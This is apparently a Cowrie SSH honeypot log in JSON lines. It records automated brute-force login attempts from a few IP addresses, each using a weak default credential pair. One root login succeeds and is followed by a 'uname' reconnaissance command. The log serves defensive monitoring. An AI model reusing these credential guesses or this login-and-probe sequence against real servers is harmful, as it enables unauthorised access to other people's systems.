{"eventid":"cowrie.login.failed","username":"33sqn","password":"33sqn","message":"login attempt [33sqn/33sqn] failed","sensor":"my-vps","timestamp":"2025-08-26T21:55:29.411390Z","src_ip":"212.227.125.160","session":"420fa2505e6f"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:55:30.744816Z","src_ip":"212.227.125.160","session":"420fa2505e6f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48244,"dst_ip":"1.2.3.4","dst_port":22,"session":"4ef9609ac293","protocol":"ssh","message":"New connection: 212.227.125.160:48244 (1.2.3.4:22) [session: 4ef9609ac293]","sensor":"my-vps","timestamp":"2025-08-26T21:55:34.972550Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:55:34.982340Z","src_ip":"212.227.125.160","session":"4ef9609ac293"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:55:35.036397Z","src_ip":"212.227.125.160","session":"4ef9609ac293"}
{"eventid":"cowrie.login.failed","username":"teamspeak","password":"teamspeak","message":"login attempt [teamspeak/teamspeak] failed","sensor":"my-vps","timestamp":"2025-08-26T21:55:35.272765Z","src_ip":"212.227.125.160","session":"4ef9609ac293"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:55:36.320038Z","src_ip":"212.227.125.160","session":"4ef9609ac293"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43636,"dst_ip":"1.2.3.4","dst_port":22,"session":"4d8248c42228","protocol":"ssh","message":"New connection: 212.227.125.160:43636 (1.2.3.4:22) [session: 4d8248c42228]","sensor":"my-vps","timestamp":"2025-08-26T21:55:41.010388Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:55:41.011057Z","src_ip":"212.227.125.160","session":"4d8248c42228"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:55:41.061715Z","src_ip":"212.227.125.160","session":"4d8248c42228"}
{"eventid":"cowrie.login.failed","username":"redis","password":"redis","message":"login attempt [redis/redis] failed","sensor":"my-vps","timestamp":"2025-08-26T21:55:41.219254Z","src_ip":"212.227.125.160","session":"4d8248c42228"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:55:42.271310Z","src_ip":"212.227.125.160","session":"4d8248c42228"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38792,"dst_ip":"1.2.3.4","dst_port":22,"session":"46c881cb7b5a","protocol":"ssh","message":"New connection: 212.227.235.229:38792 (1.2.3.4:22) [session: 46c881cb7b5a]","sensor":"my-vps","timestamp":"2025-08-26T21:55:43.769731Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:55:44.837913Z","src_ip":"212.227.235.229","session":"46c881cb7b5a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T21:55:44.838623Z","src_ip":"212.227.235.229","session":"46c881cb7b5a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39020,"dst_ip":"1.2.3.4","dst_port":22,"session":"50366684da58","protocol":"ssh","message":"New connection: 212.227.125.160:39020 (1.2.3.4:22) [session: 50366684da58]","sensor":"my-vps","timestamp":"2025-08-26T21:55:46.463320Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:55:46.616022Z","src_ip":"212.227.125.160","session":"50366684da58"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:55:46.616682Z","src_ip":"212.227.125.160","session":"50366684da58"}
{"eventid":"cowrie.login.failed","username":"git","password":"123","message":"login attempt [git/123] failed","sensor":"my-vps","timestamp":"2025-08-26T21:55:47.063158Z","src_ip":"212.227.125.160","session":"50366684da58"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:55:48.111073Z","src_ip":"212.227.125.160","session":"50366684da58"}
{"eventid":"cowrie.login.failed","username":"admin","password":"321","message":"login attempt [admin/321] failed","sensor":"my-vps","timestamp":"2025-08-26T21:55:49.789691Z","src_ip":"212.227.235.229","session":"46c881cb7b5a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34410,"dst_ip":"1.2.3.4","dst_port":22,"session":"ab97e5ea9ec1","protocol":"ssh","message":"New connection: 212.227.125.160:34410 (1.2.3.4:22) [session: ab97e5ea9ec1]","sensor":"my-vps","timestamp":"2025-08-26T21:55:51.737860Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:55:51.751176Z","src_ip":"212.227.125.160","session":"ab97e5ea9ec1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:55:51.789465Z","src_ip":"212.227.125.160","session":"ab97e5ea9ec1"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:55:51.836319Z","src_ip":"212.227.235.229","session":"46c881cb7b5a"}
{"eventid":"cowrie.login.failed","username":"user6","password":"user6","message":"login attempt [user6/user6] failed","sensor":"my-vps","timestamp":"2025-08-26T21:55:51.995563Z","src_ip":"212.227.125.160","session":"ab97e5ea9ec1"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:55:53.047787Z","src_ip":"212.227.125.160","session":"ab97e5ea9ec1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58030,"dst_ip":"1.2.3.4","dst_port":22,"session":"fc90488b8746","protocol":"ssh","message":"New connection: 212.227.125.160:58030 (1.2.3.4:22) [session: fc90488b8746]","sensor":"my-vps","timestamp":"2025-08-26T21:55:57.276377Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:55:57.278508Z","src_ip":"212.227.125.160","session":"fc90488b8746"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:55:57.324402Z","src_ip":"212.227.125.160","session":"fc90488b8746"}
{"eventid":"cowrie.login.failed","username":"azureuser","password":"azureuser","message":"login attempt [azureuser/azureuser] failed","sensor":"my-vps","timestamp":"2025-08-26T21:55:57.513764Z","src_ip":"212.227.125.160","session":"fc90488b8746"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:55:58.562201Z","src_ip":"212.227.125.160","session":"fc90488b8746"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53416,"dst_ip":"1.2.3.4","dst_port":22,"session":"62fb4016637f","protocol":"ssh","message":"New connection: 212.227.125.160:53416 (1.2.3.4:22) [session: 62fb4016637f]","sensor":"my-vps","timestamp":"2025-08-26T21:56:03.367653Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:56:03.506147Z","src_ip":"212.227.125.160","session":"62fb4016637f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:56:03.506925Z","src_ip":"212.227.125.160","session":"62fb4016637f"}
{"eventid":"cowrie.login.success","username":"root","password":"aa123456","message":"login attempt [root/aa123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:56:03.880231Z","src_ip":"212.227.125.160","session":"62fb4016637f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:56:04.067574Z","src_ip":"212.227.125.160","session":"62fb4016637f"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T21:56:04.068260Z","src_ip":"212.227.125.160","session":"62fb4016637f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:56:04.118821Z","src_ip":"212.227.125.160","session":"62fb4016637f"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:56:04.120003Z","src_ip":"212.227.125.160","session":"62fb4016637f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48800,"dst_ip":"1.2.3.4","dst_port":22,"session":"4830a5c23963","protocol":"ssh","message":"New connection: 212.227.125.160:48800 (1.2.3.4:22) [session: 4830a5c23963]","sensor":"my-vps","timestamp":"2025-08-26T21:56:08.361602Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:56:08.364631Z","src_ip":"212.227.125.160","session":"4830a5c23963"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:56:08.409652Z","src_ip":"212.227.125.160","session":"4830a5c23963"}
{"eventid":"cowrie.login.failed","username":"ssm-user","password":"ssm-user","message":"login attempt [ssm-user/ssm-user] failed","sensor":"my-vps","timestamp":"2025-08-26T21:56:08.591066Z","src_ip":"212.227.125.160","session":"4830a5c23963"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:56:09.652939Z","src_ip":"212.227.125.160","session":"4830a5c23963"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44188,"dst_ip":"1.2.3.4","dst_port":22,"session":"e67abab27976","protocol":"ssh","message":"New connection: 212.227.125.160:44188 (1.2.3.4:22) [session: e67abab27976]","sensor":"my-vps","timestamp":"2025-08-26T21:56:14.109909Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:56:14.112560Z","src_ip":"212.227.125.160","session":"e67abab27976"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:56:14.155480Z","src_ip":"212.227.125.160","session":"e67abab27976"}
{"eventid":"cowrie.login.failed","username":"adminbnt","password":"adminbnt","message":"login attempt [adminbnt/adminbnt] failed","sensor":"my-vps","timestamp":"2025-08-26T21:56:14.350454Z","src_ip":"212.227.125.160","session":"e67abab27976"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:56:15.649872Z","src_ip":"212.227.125.160","session":"e67abab27976"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.112","src_port":30876,"dst_ip":"1.2.3.4","dst_port":22,"session":"a9ef5b58d5cc","protocol":"ssh","message":"New connection: 80.94.95.112:30876 (1.2.3.4:22) [session: a9ef5b58d5cc]","sensor":"my-vps","timestamp":"2025-08-26T21:56:19.131177Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T21:56:19.132135Z","src_ip":"80.94.95.112","session":"a9ef5b58d5cc"}
